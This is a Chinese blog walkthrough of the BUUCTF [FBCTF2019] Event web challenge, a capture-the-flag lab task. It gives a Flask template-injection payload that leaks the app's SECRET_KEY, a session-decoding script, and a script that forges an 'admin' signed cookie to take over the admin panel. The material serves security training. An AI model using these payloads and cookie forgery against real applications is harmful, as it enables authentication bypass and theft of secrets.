BUUCTF [FBCTF2019] Event

最新推荐文章于 2024-03-20 09:51:35 发布
最新推荐文章于 2024-03-20 09:51:35 发布
阅读量429 收藏 1
点赞数 1
分类专栏: BUUCTF WEB Writeup 文章标签: BUUCTF FBCTF2019 Event writeup CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44037296/article/details/112550838
版权

BUUCTF [FBCTF2019] Event

考点:

  1. Flask模版注入
  2. 伪造Session登陆
  3. 非常规格式SECRET_KEY加密

启动环境:
在这里插入图片描述
一个登陆注册页面,若点击Admin panel,提示:
在这里插入图片描述
使用Username:test,Password:test登陆后:
在这里插入图片描述
并没有限制登陆,可能是成功注册用户test
可以向数据库中添加新的事件,尝试添加:

Name:hahaha
Address:8.8.8.8

得到回显:
在这里插入图片描述
其选项框可以选择显示添加的事件名或事件地址
在这里插入图片描述
此时再次点击Admin panel,提示:
在这里插入图片描述
猜到了结果,可能是伪造admin用户登陆,查看Cookie:

Cookie: user=InRlc3Qi.X_3LKg.ZtskcvsQoZPJ-mCYf3QbDXszGjs; events_sesh_cookie=.eJwlzjsOwjAMANC7eO7gb2L3MlUUO4K1pRPi7iCxvum94VhnXQ_YX-ddGxzPhB2sgoKnttWqazVzoxis5g15pcfyQkVmjzBhJ_TqJEga1KukscZM-qEb4zTJmNGHqWSOJlqMXbDEegsxtSUptYjJ0VPGgg3uq85_huDzBY--LAs.X_3LKg.CfhiYEpWBT8uyYqkgRyptIBYbXs

其中events_sesh_cookie中很明显的开头.eJw,使用Python3脚本解密:

import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode


def decryption(payload):
    payload, sig = payload.rsplit(b'.', 1)
    payload, timestamp = payload.rsplit(b'.', 1)

    decompress = False
    if payload.startswith(b'.'):
        payload = payload[1:]
        decompress = True

    try:
        payload = base64_decode(payload)
    except Exception as e:
        raise Exception('Could not base64 decode the payload because of '
                        'an exception')

    if decompress:
        try:
            payload = zlib.decompress(payload)
        except Exception as e:
            raise Exception('Could not zlib decompress the payload before '
                            'decoding the payload')

    return session_json_serializer.loads(payload)


if __name__ == '__main__':
    print(decryption(sys.argv[1].encode()))

运行命令:

python3 flask-session-decode.py .eJwlzjsOwjAMANC7eO7gb2L3MlUUO4K1pRPi7iCxvum94VhnXQ_YX-ddGxzPhB2sgoKnttWqazVzoxis5g15pcfyQkVmjzBhJ_TqJEga1KukscZM-qEb4zTJmNGHqWSOJlqMXbDEegsxtSUptYjJ0VPGgg3uq85_huDzBY--LAs.X_3LKg.CfhiYEpWBT8uyYqkgRyptIBYbXs

得到回显:
在这里插入图片描述
感觉并没有什么身份验证的内容,若有可能是'user_id': '1',猜测admin用户为0
尝试解密user=InRlc3Qi.X_3LKg.ZtskcvsQoZPJ-mCYf3QbDXszGjs;,得到:
在这里插入图片描述
那应该和'user_id': '1'没什么关系了,直接得到了用户名,接下来就是获取到其SECRET_KEY的值

既然存在输入点,尝试模版注入
页面存在三个输入点:event_nameevent_addressevent_important,在提交时使用BurpSuite抓取数据包:
在这里插入图片描述
修改event_important=__dict__,发送数据包,得到回显:
在这里插入图片描述
成功执行,尝试查看配置文件:

__class__.__init__.__globals__[app].config

得到回显:

<Config {
'ENV': 'production', 
'DEBUG': False, 
'TESTING': False, 
'PROPAGATE_EXCEPTIONS': None, 
'PRESERVE_CONTEXT_ON_EXCEPTION': None, 
'SECRET_KEY': 'fb+wwn!n1yo+9c(9s6!_3o#nqm&&_ej$tez)$_ik36n8d7o6mr#y', 
'PERMANENT_SESSION_LIFETIME': datetime.timedelta(days=31), 'USE_X_SENDFILE': False, 
'SERVER_NAME': None, 
'APPLICATION_ROOT': '/', 
'SESSION_COOKIE_NAME': 'events_sesh_cookie', 
'SESSION_COOKIE_DOMAIN': False, 
'SESSION_COOKIE_PATH': None, 
'SESSION_COOKIE_HTTPONLY': True, 
'SESSION_COOKIE_SECURE': False, 
'SESSION_COOKIE_SAMESITE': None, 
'SESSION_REFRESH_EACH_REQUEST': True, 
'MAX_CONTENT_LENGTH': None, 
'SEND_FILE_MAX_AGE_DEFAULT': datetime.timedelta(seconds=43200), 'TRAP_BAD_REQUEST_ERRORS': None, 
'TRAP_HTTP_EXCEPTIONS': False, 
'EXPLAIN_TEMPLATE_LOADING': False, 
'PREFERRED_URL_SCHEME': 'http', 
'JSON_AS_ASCII': True, 
'JSON_SORT_KEYS': True, 
'JSONIFY_PRETTYPRINT_REGULAR': False, 
'JSONIFY_MIMETYPE': 'application/json', 
'TEMPLATES_AUTO_RELOAD': None, 
'MAX_COOKIE_SIZE': 4093, 
'SQLALCHEMY_DATABASE_URI': 'sqlite:///my.db', 
'SQLALCHEMY_TRACK_MODIFICATIONS': False, 
'SQLALCHEMY_BINDS': None, 
'SQLALCHEMY_NATIVE_UNICODE': None, 
'SQLALCHEMY_ECHO': False, 
'SQLALCHEMY_RECORD_QUERIES': None, 
'SQLALCHEMY_POOL_SIZE': None, 
'SQLALCHEMY_POOL_TIMEOUT': None, 
'SQLALCHEMY_POOL_RECYCLE': None, 
'SQLALCHEMY_MAX_OVERFLOW': None, 
'SQLALCHEMY_COMMIT_ON_TEARDOWN': False, 
'SQLALCHEMY_ENGINE_OPTIONS': {}
}>

其中包含有'SECRET_KEY': 'fb+wwn!n1yo+9c(9s6!_3o#nqm&&_ej$tez)$_ik36n8d7o6mr#y'

以为很简单的使用flask-session-cookie-manager加密session即可,但是在加密时一直报错:
在这里插入图片描述
可能是因为其"admin"的格式不对,参照了大佬的加密脚本:

from flask import Flask
from flask.sessions import SecureCookieSessionInterface

app = Flask(__name__)
app.secret_key = b'fb+wwn!n1yo+9c(9s6!_3o#nqm&&_ej$tez)$_ik36n8d7o6mr#y'

session_serializer = SecureCookieSessionInterface().get_signing_serializer(app)

@app.route('/')
def index():
    print(session_serializer.dumps("admin"))

index()

得到解密后的Cookie:ImFkbWluIg.X_3YzA.AeKRWJibmKnnUXyWk_Dyp2sqHeM
将其替换:
在这里插入图片描述
刷新页面后,进入到Admin panel,得到flag:
在这里插入图片描述

Senimo_
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Event sourcing
05-04
Event Sourcing 和 CQRS 在微服务系统架构中的应用 Event Sourcing 是一种软件架构模式,它将系统状态的变化作为事件的序列来描述。事件源系统会记录所有的状态变化,包括业务逻辑和数据模型的变化。这种架构模式...
hacktoberfest-event-2019
02-13
【标题】"hacktoberfest-event-2019" 指的是2019年举办的Hacktoberfest活动,这是一个全球性的开源软件贡献活动。Hacktoberfest由DigitalOcean、GitHub和DEV社区联合主办,旨在鼓励人们参与开源项目,提高开源软件的...
BUUCTF--[FBCTF2019]Event
qq_46263951的博客
08-14 237
进入页面,注册登录 访问flag 查看Cookie,这里很容易就猜到是要伪造Cookie 这里有三个参数,上传内容并用Burp抓包可以发现三个参数所对应的变量名. 看大佬的wp知道 在event_important参数存在模版注入,输入__dict__,发现成功回显接着查找配置文件:__class__.__init__.__globals__[app].config 发现加密所需的密钥,伪造session from flask import Flask from flask.sessio...
BUUCTF:[FBCTF2019]Event
末初的CSDN博客
07-29 850
题目地址:https://buuoj.cn/challenges#[FBCTF2019]Event 模版注入+Cookie伪造 Cookie:Im1vY2h1Ig.XyDM5A.RIObE23_pwucPR7ZAVNsm_cOwpU 加密方式未知,密钥未知 在提交数据的时候,有三个可控参数,经测试在event_important参数存在模版注入,输入__dict__,发现成功回显 接着查找配置文件:__class__.__init__.__globals__[app].config 发现密钥,开始
[FBCTF2019]Event
qq_45691294的博客
09-29 684
打开题目,只有一个登录注册框,无法使用admin登录注册 在 /flag 页面中提示我们并不是管理员,猜测要得到管理员权限才可以Get Flag 在主页看到表单,先随意输入一些值进去,页面回显了Name of your event 的值 这里有可能存在xss或者SSTI,尝试后,无css,应该存在SSTI 抓包发现cookie,event_sesh_cookie应该是jwt加密过 大致猜测出本题应该是可以通过SSTI得到密钥伪造cookie,越权登录admin的账户 在提交数据的时候,有三个可控参数
FacebookCTF2019 web writeup
river
06-05 3296
facebookCTF2019 rceservice - 绕过preg_match http://challenges.fbctf.com:8085 We created this web interface to run commands on our servers, but since we haven't figured out how to secure it yet we only l...
探索Facebook的开源CTF平台:FBCTF
最新发布
gitblog_00088的博客
03-20 377
探索Facebook的开源CTF平台:FBCTF 项目地址:https://gitcode.com/facebookarchive/fbctf 在网络安全教育和实践中,Capture The Flag(CTF)是一种流行的形式,它允许参与者通过解决各种安全挑战来提升技能。Facebook开源的FBCTF是一个完全托管式的CTF平台,旨在帮助组织者轻松创建和管理CTF竞赛。本文将深入探讨FBC...
C#event线程安全
01-27
在C#编程中,`event`关键字用于实现发布/订阅模式,它确保了代码的封装性和安全性。在多线程环境中,线程安全是至关重要的,尤其是涉及到共享数据时。在C#中,`event`的实现考虑了线程安全问题,尤其是在C#3.0和4.0...
js的event详解。
12-11
event代表事件的状态,例如触发event对象的元素、鼠标的位置及状态、按下的键等等。 event对象只在事件发生的过程中才有效。 event的某些属性只对特定的事件有意义。比如,fromElement 和 toElement 属性只对 ...
event-log-tags
09-11
(Android 11)Event所有的tags:/system/etc/event-log-tags
虚拟机搭建FBCTF平台,汉化版FBCTF-附件资源
03-02
虚拟机搭建FBCTF平台,汉化版FBCTF-附件资源
探索Facebook的FBCTF:一个开源的网络安全竞赛平台
gitblog_00073的博客
03-20 408
探索Facebook的FBCTF:一个开源的网络安全竞赛平台 项目地址:https://gitcode.com/facebook/fbctf 项目简介 FBCTF 是由Facebook开发的一个开源项目,旨在为网络安全爱好者提供一个在线平台,进行Capture The Flag (CTF) 竞赛。CTF是一种流行的技术安全比赛形式,参与者需要解决一系列安全挑战,涉及逆向工程、密码学、Web应...
buuctf-web-homebrew event loop
weixin_43345082的博客
08-26 385
源码太多就不贴了 四个按钮 一个是看源码 一个是进商店买 一个是重置 一个是返回index 然后url的格式都是这样的 ?action:index;True%23False ?action:view;shop ?action:view;reset ?action:view;index 分析一下流程 首先登陆的时候 http://url_prefix/d5afe1f66147e857/ 会先进入这...
FBCTF平台搭建
热门推荐
单核CPU的小朋友的博客
11-02 4万+
自从入了安全的坑,就喜欢去各大CTF平台战斗==其实我也特别想拥有一个属于自己的CTF平台。直到我有一天发现了一个炫酷的平台——FBCTF。 首先你要使用Ubuntu来安装并运行这个平台。我在kali里装过,没装上去。好像是python的一个模块一直装不上跳错。至于别的操作系统我就没有试过了。。 这里官方钦定版本是ubuntu14.0.3.但是其实你ubuntu的版本在2016年之后的理论上都是可...
fbctf平台设置
0x88
04-26 2025
1.重置数据库默认的数据库密码为ctf执行一下命令cat /var/www/fbctf/database/schema.sql /var/www/fbctf/database/countries.sql /var/www/fbctf/database/logos.sql | mysql -u ctf -p fbctf 然后重启服务或者重启服务器2.重设管理员密码source ./extra/lib...
CTF SSTI 一些记录
3569
10-13 5826
https://ctftime.org/writeup/10895 https://www.xmsec.cc/ssti-and-bypass-sandbox-in-jinja2/   ▼▼▼Shrine(Web:solved 58/810=7.1%)▼▼▼ This writeup is written by @kazkiti_ctf GET / HTTP/1.1 Host: shri...
docker学习笔记5【实战:将ctfweb题环境docker打包供他人使用】
Sp4rkW的博客
01-05 8518
置顶,一个很不错的wiki,点这里 历时三天,玩坏三个虚拟机,云服务器重置一次,终于算是docker入门了,回想起来其实还是linux的一些操作不太熟导致的各种报错,其实还是比较简单的,下面用实战从零来总结一下docker的用法: 1、vmvare安装ubuntu16.04虚拟机 略,教程很多,镜像推荐去官网下载,被不好的镜像坑过 2、更新ubuntu源为国内源 略,同上,百度攻略很...
虚拟机的安装与汉化
Abel.lin的专栏
02-15 2119
虚拟机VMware-workstation-full-7.1.4-385536下载地址:http://115.com/file/dpiixhqp#VMware-workstation-full-v7.1.4.zip 虚拟机汉化包下载地址:http://115.com/file/anjj4c5n#VMware_Workstation完美汉化包.rar 解压虚拟机压缩包,双击VMware-work

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值